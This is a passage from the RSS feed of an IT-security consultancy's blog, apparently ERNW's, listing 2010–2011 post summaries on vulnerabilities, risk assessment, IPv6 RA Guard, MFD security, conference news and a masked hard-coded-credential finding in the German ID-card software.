      <description>&lt;p&gt;I can’t help myself. And I fully understand that some of you, dear readers, might get a bit annoyed by always hearing the same tune from our side. This post is, surprise!, about yesterday’s Microsoft Patch Tuesday which – as can be seen &lt;a href=&#34;http://www.microsoft.com/technet/security/bulletin/ms11-apr.mspx&#34;&gt;here&lt;/a&gt; and &lt;a href=&#34;http://blogs.technet.com/b/srd/archive/2011/04/12/assessing-the-risk-of-the-april-security-updates.aspx%20&#34;&gt;here&lt;/a&gt; – disclosed quite a number of vulnerabilities in various Microsoft components. To make the point evoked in this post’s title I’d like to draw your attention to two particular bulletins, both rated as critical.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Sisters’ Act of MFD Security</title>
      <link>https://insinuator.net/2011/04/sisters-act-of-mfd-security/</link>
      <pubDate>Thu, 07 Apr 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/04/sisters-act-of-mfd-security/</guid>
      <description>&lt;p&gt;Recently Micele and I were researching for our talk about the current state of security of Multifunction Devices (MFDs). Since we’re both seasoned pentesters who are quite familar with MFDs, we were really surprised that very little new research is going on on the topic of MFD security. While diving deeper into the topic, we found a very simple explanation for this: As in 2002, it is still possible to download print or scan jobs using &lt;a href=&#34;http://h20000.www2.hp.com/bc/docs/support/SupportManual/bpl13208/bpl13208.pdf&#34;&gt;PJL&lt;/a&gt;, many devices still offer default FTP or Telnet access, and, of course, stored files can be recovered from MFD hard drives — on an enterprise wide scale. To even strengthen our impression of the current state of MFD security, most devices crashed or did go wild while performing some scans — and we do not talk about fuzzing here.&lt;/p&gt;</description>
    </item>
    <item>
      <title>RSA: Anatomy of an Attack</title>
      <link>https://insinuator.net/2011/04/rsa-anatomy-of-an-attack/</link>
      <pubDate>Wed, 06 Apr 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/04/rsa-anatomy-of-an-attack/</guid>
      <description>&lt;p&gt;Lots of stuff has been written about &lt;a href=&#34;http://blogs.rsa.com/rivner/anatomy-of-an-attack/&#34;&gt;this blog post&lt;/a&gt; from RSA describing the (potential) details of the attack, so I will refrain from detailed comments on this piece that Marsh Ray nicely called “some of the most egregious hyperbole I’ve read in infosec”.&lt;/p&gt;&#xA;&lt;p&gt;Just one short note. Presumably the attack, in an early stage, used a “spreadsheet [that] contained a zero-day exploit that installs a backdoor through an Adobe Flash vulnerability (CVE-2011-0609)”.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TROOPERS11 – Slides available</title>
      <link>https://insinuator.net/2011/04/troopers11-slides-available/</link>
      <pubDate>Tue, 05 Apr 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/04/troopers11-slides-available/</guid>
      <description>&lt;p&gt;&lt;strong&gt;TROOPERS11&lt;/strong&gt; slides are available now! Please find them here: &lt;a href=&#34;http://www.troopers.de/troopers11/downloads/&#34;&gt;http://www.troopers.de/troopers11/downloads/&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;TROOPERS11&lt;/strong&gt; was a blast! We received great feedback from all attendees and speakers. This really pushes ourselves towards the next goals and an even better security conference in 2012.&lt;/p&gt;&#xA;&lt;p&gt;We’re happy that everybody got home safely with new ideas and inspirations in mind. On a side note: The awesome &lt;strong&gt;TROOPERS&lt;/strong&gt; badge caused trouble for some of you with the airport security 😉 I really hope everybody could find a way to take it back home. It will hopefully find its way to an adequate place right next to your old memorabilia (cup of the first won soccer match, your college degree or photos from your first ballet show). Regard it as the proof of your latest achievement and tell everybody proud and loud: &lt;strong&gt;WE ARE TROOPERS.&lt;/strong&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Reflections on the RSA Break-in</title>
      <link>https://insinuator.net/2011/03/reflections-on-the-rsa-break-in/</link>
      <pubDate>Sun, 20 Mar 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/03/reflections-on-the-rsa-break-in/</guid>
      <description>&lt;p&gt;Some of you may have heard of the &lt;a href=&#34;http://www.rsa.com/node.aspx?id=3872&#34;&gt;break-in at RSA&lt;/a&gt; and may now be wondering “what does this mean to us?” and “what can be done?”. Not being an expert on RSA SecurID at all – I’ve been involved in some projects, however not on the technical implementation side but on the architecture or overall [risk] management side – I’ll still try to contribute to the debate 😉&lt;/p&gt;&#xA;&lt;p&gt;Feel free to correct me either by comment or by personal email in case the following contains factual errors.&lt;/p&gt;</description>
    </item>
    <item>
      <title>VMSA-2011-0005: VMware vCenter Orchestrator remote code execution vulnerability</title>
      <link>https://insinuator.net/2011/03/vmsa-2011-0005-vmware-vcenter-orchestrator-remote-code-execution-vulnerability/</link>
      <pubDate>Mon, 14 Mar 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/03/vmsa-2011-0005-vmware-vcenter-orchestrator-remote-code-execution-vulnerability/</guid>
      <description>&lt;p&gt;Reading &lt;a href=&#34;http://www.vmware.com/security/advisories/VMSA-2011-0005.html&#34;&gt;this advisory&lt;/a&gt; I’m quite tempted to emit another rant on the relationship of heavy use of 3rd party components, lack of (security) quality assurance and services running at times where they’re not needed (see second workaround &lt;a href=&#34;http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&amp;amp;cmd=displayKC&amp;amp;externalId=1034175&#34;&gt;here&lt;/a&gt;). I’ll refrain  from that for today. Just wanted to let you know that the &lt;a href=&#34;http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html&#34;&gt;underlying vulnerability&lt;/a&gt; in Struts2 was initially discovered by Meder Kydyraliev who gives &lt;a href=&#34;http://www.troopers.de/troopers11/agenda/milking-a-horse-or-executing-remote-code-in-modern-java-web-frameworks/&#34;&gt;this talk&lt;/a&gt; at &lt;a href=&#34;http://www.troopers.de&#34;&gt;Troopers&lt;/a&gt; in two weeks. He’ll certainly describe the inner workings of this one, and others… 😉&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Security ‒ The Story Continues</title>
      <link>https://insinuator.net/2011/03/ipv6-security-the-story-continues/</link>
      <pubDate>Wed, 09 Mar 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/03/ipv6-security-the-story-continues/</guid>
      <description>&lt;p&gt;Just a short addition to the previous posts (&lt;a href=&#34;http://www.insinuator.net/2011/01/ipv6-security-part-1-ra-guard-the-theory-3/&#34;&gt;[1]&lt;/a&gt;, &lt;a href=&#34;http://www.insinuator.net/2011/03/ipv6-security-part-2-ra-guard-%E2%80%93-lets-get-practical/&#34;&gt;[2]&lt;/a&gt;) on IPv6 security today. In the last two days I had the opportunity to sharpen my understanding of some aspects of IPv6 behavior in (Windows-) LANs. Actually I gave an IPv6 workshop for some members of the “Project Services” team of Hamburg-based &lt;a href=&#34;http://www.cuc.de&#34;&gt;computer &amp;amp; competence&lt;/a&gt; IT-solutions provider [btw: thanks to Mr. Wendler of CuC for organizing it, and thanks to Mr. Cassel for the breakfast…].&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Security Part 2, RA Guard – Let’s get practical</title>
      <link>https://insinuator.net/2011/03/ipv6-security-part-2-ra-guard-lets-get-practical/</link>
      <pubDate>Sat, 05 Mar 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/03/ipv6-security-part-2-ra-guard-lets-get-practical/</guid>
      <description>&lt;p&gt;Hi everybody,&lt;/p&gt;&#xA;&lt;p&gt;this post is the sequel of &lt;a href=&#34;http://www.insinuator.net/2011/01/ipv6-security-part-1-ra-guard-the-theory-3/&#34;&gt;this one&lt;/a&gt; on the IPv6 security feature called “RA guard”. As announced in that post I recently got a 4948 on ebay. After installing the appropriate image and noticing that RA guard was still unavailable I found out it should have been a 4948E which is capable of “doing IPv6 in hardware” (as opposed to the “simple 4948” only supporting IPv6 in a “software switched” way. and pls note there’s also the informal term 4948-E denoting a 4948 running an “enhanced image”).&lt;/p&gt;</description>
    </item>
    <item>
      <title>GTP_SCAN released</title>
      <link>https://insinuator.net/2011/03/gtp_scan-released/</link>
      <pubDate>Tue, 01 Mar 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/03/gtp_scan-released/</guid>
      <description>&lt;p&gt;gtp_scan is a small python script that scans for GTP (GPRS tunneling protocol) speaking hosts. To discover those hosts it uses the GTP build in PING mechanism, it sends a GTP packet of the type ECHO_REQUEST and listens for an incoming GTP ECHO_REPLY. Its capable of generating ECHO_REQUESTS for GTP version 1 and GTP version 2. Also the script can scan for both, GTP-C and GTP-U (the control channel and the user data channel), only the port differs here.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Ross Anderson on Responsible Disclosure and Academic Freedom</title>
      <link>https://insinuator.net/2011/01/ross-anderson-on-responsible-disclosure-and-academic-freedom/</link>
      <pubDate>Thu, 06 Jan 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/01/ross-anderson-on-responsible-disclosure-and-academic-freedom/</guid>
      <description>&lt;p&gt;Hi,&lt;/p&gt;&#xA;&lt;p&gt;just a short, somewhat non-technical,  post today: I really like &lt;a href=&#34;http://www.cl.cam.ac.uk/~rja14/Papers/ukca.pdf&#34;&gt;this response&lt;/a&gt; Ross Anderson gave to the “UK Cards Association” asking Cambridge University for taking offline a thesis of one of their students. It (the letter) pretty much summarizes how security research should be treated and backed by those interested in a more secure world we live in.&lt;/p&gt;&#xA;&lt;p&gt;On a personal note I’d like to add that Ross’ main volume “Security Engineering: A Guide to Building Dependable Distributed Systems”, initially published in 2001 and updated in the interim with a second edition in 2008, has been the most influential security book for me on my long way in the infosec space (which started back in 1997, with some workshops on firewalls I gave for IT auditors). If I could take only one infosec book to a lonely island, it would be this one.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Security Part 1, RA Guard – The Theory</title>
      <link>https://insinuator.net/2011/01/ipv6-security-part-1-ra-guard-the-theory/</link>
      <pubDate>Wed, 05 Jan 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/01/ipv6-security-part-1-ra-guard-the-theory/</guid>
      <description>&lt;p&gt;Hi,&lt;/p&gt;&#xA;&lt;p&gt;at first a happy new year to our loyal readers (and, of course, to everybody else too ;-)! We hope you all had some pleasant transition times, not suffering from bad hangovers after 27C3 or sth 😉&lt;/p&gt;&#xA;&lt;p&gt;Things are heating up for &lt;a href=&#34;http://www.troopers.de&#34;&gt;Troopers&lt;/a&gt; and in the course of that we started putting together the slides for the workshops (I’m delighted that Flo told me today there’s already quite a number of bookings for the workshops…). I myself will give the “IPv6 Security in LANs” workshop, together with Christopher. The workshop preparation will be accompanied by a series of blogposts with three main areas to be covered:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Cloud needn’t be daunting | Guide to legal aspects for non-legals</title>
      <link>https://insinuator.net/2010/12/cloud-neednt-be-daunting-guide-to-legal-aspects-for-non-legals/</link>
      <pubDate>Thu, 23 Dec 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/12/cloud-neednt-be-daunting-guide-to-legal-aspects-for-non-legals/</guid>
      <description>&lt;p&gt;The British Standards Institution recently published “Cloud Computing. A Practical Introduction to the Legal Issues”. I ordered an electronic copy yesterday (I did that &lt;a href=&#34;http://shop.bsigroup.com/en/ProductDetail/?pid=000000000030215581&#34;&gt;here&lt;/a&gt;, for GBP 30) and after a first glance can say there’s lots of valuable information in it.&lt;/p&gt;&#xA;&lt;p&gt;Merry christmas to everybody, have some peaceful and relaxing days&lt;/p&gt;&#xA;&lt;p&gt;Enno&lt;/p&gt;</description>
    </item>
    <item>
      <title>The OSSTMM 3 – What I like about it</title>
      <link>https://insinuator.net/2010/12/the-osstmm-3-what-i-like-about-it/</link>
      <pubDate>Mon, 13 Dec 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/12/the-osstmm-3-what-i-like-about-it/</guid>
      <description>&lt;p&gt;Given the upcoming public release of &lt;a href=&#34;http://www.isecom.org&#34;&gt;ISECOM&lt;/a&gt;‘s &lt;a href=&#34;http://www.isecom.org/osstmm/&#34;&gt;Open Source Security Testing Methodology Manual (OSSTMM)&lt;/a&gt; version 3, I took the opportunity to have a closer look at it. While we at ERNW never adopted the OSSTMM for our own way of performing security assessments (mostly due to the fact that performing assessments is our main business since 2001 and our approach has been developed and constantly honed since then so that we’re simply used to doing it “our way”) I’ve followed parts of ISECOM’s work quite closely as some of the brightest minds in the security space are contributing to it and they come up with innovative ideas regularly.&lt;br&gt;&#xA;So I was eager to get an early copy of it to spend some weekend time going through it (where I live we have about 40 cm of snow currently so there’s “plenty of occasions for a cosy reading session” ;-))&lt;br&gt;&#xA;One can read the OSSTMM (at least) two ways: as a manual for performing security testing or as a “whole philosophy of approaching [information] security”. I did the latter and will comment on it in a two-part post, covering the things I liked first and taking a more critical perspective on some portions in the second. Here we go with the first, in an unordered manner:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Security Benefit &amp; Operational Impact or “the Illusion of Infinite Resources”</title>
      <link>https://insinuator.net/2010/12/security-benefit-operational-impact-or-the-illusion-of-infinite-resources/</link>
      <pubDate>Sat, 11 Dec 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/12/security-benefit-operational-impact-or-the-illusion-of-infinite-resources/</guid>
      <description>&lt;p&gt;When taking security decisions of whatever kind (e.g. for/against a certain control) one should always consider two main parameters: the security benefit of some action (“how much do we gain with regard to security/to risk reduction?”) and  the operational impact or effort (“how much does it cost us opex-wise?”).&lt;br&gt;&#xA;While this may seem fairly obvious it is often overlooked. One reason is that people think “doing more can’t hurt”. Which, unfortunately might be plain wrong in many cases. There is _always_ an operational cost of an additional measure. And the security benefit _must_ be worth this cost.&lt;br&gt;&#xA;If it’s not, implementing a certain control might just be… waste.&lt;br&gt;&#xA;Before giving two examples I’d like to note that this is one aspect I particularly like in the &lt;a href=&#34;http://www.isecom.org/osstmm/&#34;&gt;ISECOM OSSTMM&lt;/a&gt; where one of the main metrics, that is the “rav” can be higher than 100% which in turn can be used “to prove when money is being overspent on the wrong types of controls or redundant controls”.&lt;br&gt;&#xA;[it should be noted that I’m in heavy disaccord with quite some other parts of the OSSTMM; more on this in a post to follow in some days. still the “rav” as a potential representation for showing waste is a really nice thing].&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers 2011 – First round of speakers selected</title>
      <link>https://insinuator.net/2010/12/troopers-2011-first-round-of-speakers-selected/</link>
      <pubDate>Tue, 07 Dec 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/12/troopers-2011-first-round-of-speakers-selected/</guid>
      <description>&lt;p&gt;We’re delighted to announce the first speakers of next year’s &lt;a href=&#34;http://www.troopers.de&#34;&gt;Troopers&lt;/a&gt; edition. Looks like it’s going to be a great event again ;-).&lt;br&gt;&#xA;Here we go:&lt;/p&gt;&#xA;&lt;p&gt;==================&lt;/p&gt;&#xA;&lt;p&gt;Ravishankar Borgaonkar &amp;amp; Kevin Redon: Femtocell: Femtostep to the Holy Grail  (Attacks &amp;amp; Research Track)&lt;/p&gt;&#xA;&lt;p&gt;Abstract: Femtocells are now being rolled out across the world to enhance third generation (3G) coverage and to provide assurance of always best connectivity in the 3G telecommunication networks. It acts as an access point that securely connect standard mobile handset to the mobile network operator’s core network using an existing wired broadband connection.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Reflections on the vulnerability factor (notes on RRA, part 3)</title>
      <link>https://insinuator.net/2010/12/reflections-on-the-vulnerability-factor-notes-on-rra-part-3/</link>
      <pubDate>Mon, 06 Dec 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/12/reflections-on-the-vulnerability-factor-notes-on-rra-part-3/</guid>
      <description>&lt;p&gt;Today I’m going to discuss the (presumably) most complex and difficult-to-handle of the three parameters contributing to a risk (as of the RRA), that is the “vulnerability [factor]”.&lt;br&gt;&#xA;First it should be noted that “likelihood” and “vulnerability” must (“mentally”) be clearly separated which means that “likelihood” denotes: likelihood of threat showing up _without_ consideration of existing controls. Security controls already present will affect the vulnerability factor (in particular if they are effective ;-), but _not_ the likelihood.&lt;br&gt;&#xA;First reflect on “how often will somebody stand at the door of our data center with the will to enter?” or “how often will a piece of malware show up at our perimeter?” or “how often will it happen that an operator commits a mistake?” and assign an associated value to the likelihood.&lt;br&gt;&#xA;Then, _in a separate_ step, think about: “will that person be able to enter my data center?” (maybe it’s an external support engineer and, given their high workload, your admins are willing to violate the external_people_only_allowed_to_access_dc_when_attended policy. which – of course – is purely fictional and will never happen in your organization ;-)) or “how effective are our perimeter controls as for malware?” (are they? ;-)) or “hmm… what’s the maturity of our change management processes?” and assign an associated value to the vulnerability factor.&lt;br&gt;&#xA;As stated in an earlier post: this will allow for identifying areas where to act and thus allow for efficient overall steering of infosec resources.&lt;br&gt;&#xA;Mixing likelihood and vulnerability might lead to self complacent stuff like “oh, evidently likelihood of unauthorized access to datacenter is ‘1’ as we have that brand new shiny access control system” …&lt;/p&gt;</description>
    </item>
    <item>
      <title>ERNW Rapid Risk Assessment (RRA), Some Additional Notes, Part 2</title>
      <link>https://insinuator.net/2010/12/ernw-rapid-risk-assessment-rra-some-additional-notes-part-2/</link>
      <pubDate>Sat, 04 Dec 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/12/ernw-rapid-risk-assessment-rra-some-additional-notes-part-2/</guid>
      <description>&lt;p&gt;This is the second part of the series (part 1 &lt;a href=&#34;http://www.insinuator.net/2010/11/ernw-rapid-risk-assessment-rra-some-additional-notes-part-1/&#34;&gt;here&lt;/a&gt;) providing some background on the way we perform risk assessments. It can be seen as a direct continuation of the last post; today I cover the &lt;em&gt;method of estimation&lt;/em&gt; and the &lt;em&gt;scale &amp;amp; calculation formula&lt;/em&gt; used.&lt;/p&gt;&#xA;&lt;h2 id=&#34;11-method-of-estimation&#34;&gt;1.1 Method of Estimation&lt;/h2&gt;&#xA;&lt;p&gt;Again, two main approaches exist&lt;a href=&#34;http://www.insinuator.net/wp-includes/js/tinymce/plugins/paste/pasteword.htm?ver=327-1235#_ftn1&#34;&gt;[1]&lt;/a&gt;:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;&lt;em&gt;Qualitative estimation&lt;/em&gt; which uses a scale of qualifying attributes (e.g. &lt;em&gt;Low, Medium, High&lt;/em&gt;) to describe the magnitude of each of the contributing factors listed above. [ISO 27005, p. 14] states that qualitative estimation may be used&#xA;&lt;ul&gt;&#xA;&lt;li&gt;As an initial screening activity to identify risks that require more detailed analysis.&lt;/li&gt;&#xA;&lt;li&gt;Where this kind of analysis is appropriate for decisions.&lt;/li&gt;&#xA;&lt;li&gt;Where the numerical data or resources are inadequate for a quantitative estimation.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;As the latter is &lt;em&gt;pretty much always&lt;/em&gt; the case for information security risks, in the infosec space usually qualitative estimation can be found. A sample qualitative scale (1–5, mapping to “very low” to “very high”) for the &lt;em&gt;vulnerability factor&lt;/em&gt; will be provided in the next part of this series.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Some More Security Research on The nPA AusweisApp</title>
      <link>https://insinuator.net/2010/11/some-more-security-research-on-the-npa-ausweisapp/</link>
      <pubDate>Mon, 22 Nov 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/11/some-more-security-research-on-the-npa-ausweisapp/</guid>
      <description>&lt;p&gt;After the initial quick shot (see this &lt;a href=&#34;http://www.insinuator.net/2010/11/our-contribution-to-the-public-discussion-about-the-german-new-id-card-npa/&#34;&gt;post&lt;/a&gt;) we decided to have a closer look. And some more stuff turned up.&lt;/p&gt;&#xA;&lt;p&gt;After decompiling the integrated java stuff we stumbled about hard coded server credentials:&lt;/p&gt;&#xA;&lt;p&gt;&lt;code&gt;package Idonttell;&lt;/code&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;code&gt; &lt;/code&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;code&gt; public abstract interface Idonttell&lt;/code&gt;&lt;br&gt;&#xA;&lt;code&gt;{&lt;/code&gt;&lt;br&gt;&#xA;&lt;code&gt;public static final boolean debug = false;&lt;/code&gt;&lt;br&gt;&#xA;&lt;code&gt;public static final boolean auth = true;&lt;/code&gt;&lt;br&gt;&#xA;&lt;code&gt;public static final String SMTP_SERVER = &amp;quot;Idonttell.openlimit.com&amp;quot;;&lt;/code&gt;&lt;br&gt;&#xA;&lt;code&gt;public static final String SMTP_USER = &amp;quot;Idonttell@Idonttell.openlimit.com&amp;quot;;&lt;/code&gt;&lt;br&gt;&#xA;&lt;code&gt;public static final String SMTP_PASSWORD = &amp;quot;Idonttell&amp;quot;;&lt;/code&gt;&lt;br&gt;&#xA;&lt;code&gt;public static final String SEND_FROM = &amp;quot;Idonttell@Idonttell.openlimit.com&amp;quot;;&lt;/code&gt;&lt;br&gt;&#xA;&lt;code&gt;public static final String[] SEND_TO = { &amp;quot;buergerclient.it-solutions@Idonttell.com&amp;quot; };&lt;/code&gt;&lt;br&gt;&#xA;&lt;code&gt;public static final String MAIL_HEADER_FIELD = &amp;quot;OpenLimitErrorMessage&amp;quot;;&lt;/code&gt;&lt;br&gt;&#xA;&lt;code&gt;public static final String MAIL_HEADER_FIELD_PROP = &amp;quot;yes&amp;quot;;&lt;/code&gt;&lt;br&gt;&#xA;&lt;code&gt;}&lt;/code&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Trust &amp; Control in the Age of Virtualization and the Cloud</title>
      <link>https://insinuator.net/2010/11/trust-control-in-the-age-of-virtualization-and-the-cloud/</link>
      <pubDate>Wed, 17 Nov 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/11/trust-control-in-the-age-of-virtualization-and-the-cloud/</guid>
      <description>&lt;p&gt;Two days ago I gave the keynote at an industry event, reflecting on the changing role of traditional security controls in the age of virtualization and the cloud. As this was an updated version of the stuff distributed in the conference proceedings, some people have asked for it. Voilà, &lt;a href=&#34;http://www.ernw.de/content/e7/e181/e1612/download1614/ERNW_LANline_VirtCloudSec_Keynote_ger.pdf&#34;&gt;here we go&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;have a good one,&lt;/p&gt;&#xA;&lt;p&gt;Enno&lt;/p&gt;</description>
    </item>
    <item>
      <title>Our contribution to the public discussion about the German new ID card (nPA)</title>
      <link>https://insinuator.net/2010/11/our-contribution-to-the-public-discussion-about-the-german-new-id-card-npa/</link>
      <pubDate>Thu, 11 Nov 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/11/our-contribution-to-the-public-discussion-about-the-german-new-id-card-npa/</guid>
      <description>&lt;p&gt;Currently there’s quite some discussion about the security properties and posture of the German new ID card (“Neuer Personalausweis”, “nPA”, some technically reasonable security discussion can here be found e.g. &lt;a href=&#34;http://blog.cj2s.de/categories/5-German-ID-Cad-nPA&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;While – as of our current knowledge – we do not expect major security flaws on the architecture level, the problems discussed so far (like &lt;a href=&#34;http://www.troopers08.org/content/e6/e461/AMATOFrancisco-evilgrade-ENG-Troopers-fk.pdf&#34;&gt;Evilgrade&lt;/a&gt; style attacks against one of the main applications or keylogging the PIN in scenarios with &lt;a href=&#34;http://www.ccc.de/de/updates/2010/sicherheitsprobleme-bei-suisseid-und-epa&#34;&gt;pinpad-less readers&lt;/a&gt; ) certainly show that security best practices must be followed by all parties involved in the development, deployment and use of the nPA and it’s associated applications. From our perspective this may be expected from the applications’ developers as well.&lt;br&gt;&#xA;Looking at this:&lt;/p&gt;</description>
    </item>
    <item>
      <title>ERNW Rapid Risk Assessment (RRA), Some Additional Notes, Part 1</title>
      <link>https://insinuator.net/2010/11/ernw-rapid-risk-assessment-rra-some-additional-notes-part-1/</link>
      <pubDate>Sun, 07 Nov 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/11/ernw-rapid-risk-assessment-rra-some-additional-notes-part-1/</guid>
      <description>&lt;p&gt;At several occasions we’ve been asked to provide some background on the &lt;a href=&#34;http://www.troopers.de/content/e728/e897/e907/TROOPERS10_Rapid_Risk_Assessment_Enno_Rey.pdf&#34;&gt;Rapid Risk Assessment (RRA)&lt;/a&gt; methodology we frequently use for a transparent (and documented) understanding of risks in certain situations and to deliver structured input for subsequent decision taking. As I had to write down (in another context) some notes on risk assessments and – from our perspective – practical, reasonable ways of performing them, I take the opportunity to lay out a bit the underlying ideas of the RRA approach. Which, btw, is no rocket science at all. Honestly, I sometimes wonder why stuff like this isn’t practiced everywhere, on a daily basis 😉&lt;/p&gt;</description>
    </item>
    <item>
      <title>The Case For/Against Split Tunneling</title>
      <link>https://insinuator.net/2010/11/the-case-for/against-split-tunneling/</link>
      <pubDate>Thu, 04 Nov 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/11/the-case-for/against-split-tunneling/</guid>
      <description>&lt;p&gt;Once again, in some customer environment the question of allowing/prohibiting split tunneling for (in this case: IPsec) VPN connections popped up today. Given our strict stance when it comes to “fundamental architectural security principles” the valued reader might easily imagine we’re no big fans of allowing split tunneling (term abbreviated in the following by “ST”), as this usually constitutes a severe violation of the “isolation principle”, further aggravated by the fact that this (violation) takes place on a “trust boundary” (of trusted/untrusted networks).&lt;br&gt;&#xA;Still, we’re security &lt;em&gt;practitioners&lt;/em&gt; (and not everybody has such a firm belief in the value of “fundamental architectural security principles” as we have), so we had to deal with the proponents’ arguments. In particular as one of them mentioned additional costs (in case of disallowed ST forcing all 80K VPN users’ web browsing through some centralized corporate infrastructure) of US$ 40,000,000.&lt;br&gt;&#xA;[yes, you read that correctly: 40 million. I’ve still no idea where this – in my perception: crazy – number comes from]. Anyhow, how to deal with this?&lt;br&gt;&#xA;Internally we performed a &lt;a href=&#34;www.troopers.de/.../TROOPERS10_Rapid_Risk_Assessment_Enno_Rey.pdf&#34;&gt;rapid risk assessment (RRA)&lt;/a&gt; focused on two main threats, that were:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Back from Day-Con</title>
      <link>https://insinuator.net/2010/10/back-from-day-con/</link>
      <pubDate>Sat, 30 Oct 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/10/back-from-day-con/</guid>
      <description>&lt;p&gt;… which was, as in the years before, an awesome &lt;a href=&#34;http://www.day-con.org&#34;&gt;event&lt;/a&gt;. Great talks, great people, great fun.&lt;br&gt;&#xA;Bruce Potter gave a &lt;a href=&#34;http://www.ernw.de/download/DayCon-10-Keynote.pdf&#34;&gt;keynote&lt;/a&gt; which did exactly what a good keynote should do: make the audience think and entertain it at the same time.&lt;br&gt;&#xA;[Those readers familiar with ERNW’s security model will certainly notice that we do not necessarily agree with everything he said. We still think that – in particular in times where infosec resources are scarce anyway – putting your bets on prevention provides a better cost/[security] benefit ratio than going for extensive detection capabilities.&lt;br&gt;&#xA;Fix the doors first, then think about installing a CCTV.&lt;br&gt;&#xA;Still, human nature tends to exchange “good security with low visibility” for “poor security with potentially good visibility” quite easily… as can be noted every day in many environments.]&lt;/p&gt;</description>
    </item>
    <item>
      <title>ERNW to contribute to government sponsored research project on telco security</title>
      <link>https://insinuator.net/2010/10/ernw-to-contribute-to-government-sponsored-research-project-on-telco-security/</link>
      <pubDate>Wed, 20 Oct 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/10/ernw-to-contribute-to-government-sponsored-research-project-on-telco-security/</guid>
      <description>&lt;p&gt;Today we dare to (mis-) use the blog for a shameless self promotion 😉&lt;br&gt;&#xA;We’re happy to announce that ERNW will contribute to a government sponsored research project called &lt;a href=&#34;http://www.asmonia.de&#34;&gt;ASMONIA&lt;/a&gt; (which stands for the German title of the project that is &lt;em&gt;Angriffsanalyse und Schutzkonzepte für MObilfunkbasierte Netzinfrastrukturen unterstützt durch kooperativen InformationsAustausch&lt;/em&gt; [&lt;em&gt;Attack analysis and Security concepts for MObile Network infrastructures, supported by collaborative Information exchAnge&lt;/em&gt;]. those readers familiar with that kind of projects will have an idea of the importance of such acronyms ;-).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Some recent presentations</title>
      <link>https://insinuator.net/2010/10/some-recent-presentations/</link>
      <pubDate>Mon, 11 Oct 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/10/some-recent-presentations/</guid>
      <description>&lt;p&gt;Just a short notice today on some recent presentations from our team. As some of you might know we regularly give talks at conferences. This not only encompasses highly sophisticated security events like Black Hat or &lt;a href=&#34;http://www.troopers.de&#34;&gt;Troopers&lt;/a&gt;. Additionally – on our mission for a safer world – we try to spread the (security) word at various industry events that are usually focused on some aspect of the large and ramified IT world, not necessarily equipped with a strong focus on information security.&lt;br&gt;&#xA;A number of such events took place in the last few weeks and here’s some links on presentations given there. While not being as technically deep as the average Black Hat or Troopers &lt;a href=&#34;http://www.troopers.de&#34;&gt;&lt;/a&gt; attendee might expect, we still hope that one or another valued reader finds them useful (pls note that some parts are in German).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Back to the roots</title>
      <link>https://insinuator.net/2010/09/back-to-the-roots/</link>
      <pubDate>Fri, 24 Sep 2010 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2010/09/back-to-the-roots/</guid>
